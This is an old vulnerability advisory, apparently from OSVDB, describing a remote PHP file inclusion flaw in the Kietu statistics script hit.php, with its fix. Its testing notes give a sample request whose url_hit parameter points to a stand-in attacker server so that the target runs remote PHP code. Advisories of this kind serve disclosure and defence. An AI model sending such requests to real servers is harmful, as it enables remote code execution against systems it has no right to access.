Kietu hit.php Arbitrary Code Execution

2003-02-17T05:36:43
ID OSVDB:3777
Type osvdb
Reporter OSVDB
Modified 2003-02-17T05:36:43

Description

Vulnerability Description

Kietu web statistics program contains a flaw that may allow a malicious user to include malicious PHP files from other locations. The issue is triggered when an attacker sends a specially-crafted URL request to the hit.php script with the parameter url_hit set to specify a malicious file. It is possible that the flaw may allow arbitrary command excution resulting in a loss of confidentiality, integrity, and/or availability.

Technical Description

When requesting a page using the parameter url_hit and specifying a location by URL it is possible to include a PHP file from a remote location.

Solution Description

Upgrade to version 2.4 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): disable allow_url_fopen and register_globals in PHP unless required by other scripts.

Short Description

Kietu web statistics program contains a flaw that may allow a malicious user to include malicious PHP files from other locations. The issue is triggered when an attacker sends a specially-crafted URL request to the hit.php script with the parameter url_hit set to specify a malicious file. It is possible that the flaw may allow arbitrary command excution resulting in a loss of confidentiality, integrity, and/or availability.

Manual Testing Notes

Example: http://victim.webserver/hit.php?url_hit=http://attacker.webserver/

When this URL request is sent to a vulnerable server it will allow the attacker to run commands specified in a file on his own server: http://attacker.webserver/config.php

References:

Vendor URL: http://www.kietu.net/ Secunia Advisory ID:8071 Bugtraq ID: 6863